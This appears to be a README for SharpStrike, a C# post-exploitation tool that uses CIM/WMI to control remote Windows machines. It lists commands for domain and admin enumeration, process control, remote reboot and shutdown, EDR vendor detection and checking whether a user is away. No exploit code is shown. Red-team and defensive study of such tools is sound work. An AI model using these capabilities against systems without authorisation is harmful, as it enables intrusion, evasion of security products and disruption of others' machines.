ls_domain_users_email*** - List domain users email address
ls_domain_groups*** - List domain user groups
ls_domain_admins*** - List domain admin users
ls_user_groups*** - List domain user with their associated groups
ls_computers*** - List computers on current domain

Process Operations
process_kill                 -  Kill a process via name or process id on the targeted machine
process_start - Start a process on the targeted machine
ps - Process listing

System Operations
active_users                 -  List domain users with active processes on the targeted system
basic_info - Used to enumerate basic metadata about the targeted system
drive_list - List local and network drives
share_list - List network shares
ifconfig - Receive IP info from NICs with active network connections
installed_programs - Receive a list of the installed programs on the targeted machine
logoff - Log users off the targeted machine
reboot (or restart) - Reboot the targeted machine
power_off (or shutdown) - Power off the targeted machine
vacant_system - Determine if a user is away from the system
edr_query - Query the local or remote system for EDR vendors

Log Operations
logon_events                 -  Identify users that have logged onto a system

* All PowerShell can be disabled by using the --nops flag, although some commands will not execute (upload/download, enable/disable WinRM)
** Denotes PowerShell usage (either using a PowerShell Runspace or through Win32_Process::Create method)
*** Denotes LDAP usage - "root\directory\ldap" namespace

Some Example Usage Commands

Console version: A Post exploitation tool written in C# uses either CIM or WMI to query remote systems. (1)

GUI version:


Solution Architecture

SharpStrike is composed of three main projects

  1. ServiceLayer -- Provides core functionality and consumed by the UI layer
  2. Models -- Contains types, shared across all projects
  3. User Interface -- GUI/Console

ServiceLayer
  1. Connector.cs

This is where the initial CIM/WMI connections are made and passed to the rest of the application

  1. ExecuteWMI.cs

All function code for the WMI commands

  1. ExecuteCIM.cs

All function code for the CIM (MI) commands


Read more

CIMplant Part 1: Detection of a C# Implementation of WMImplant

WMImplant – A WMI Based Agentless Post-Exploitation RAT Developed in PowerShell

SharpStrike | Post-exploitation tool | CIM & WMI Inside



❌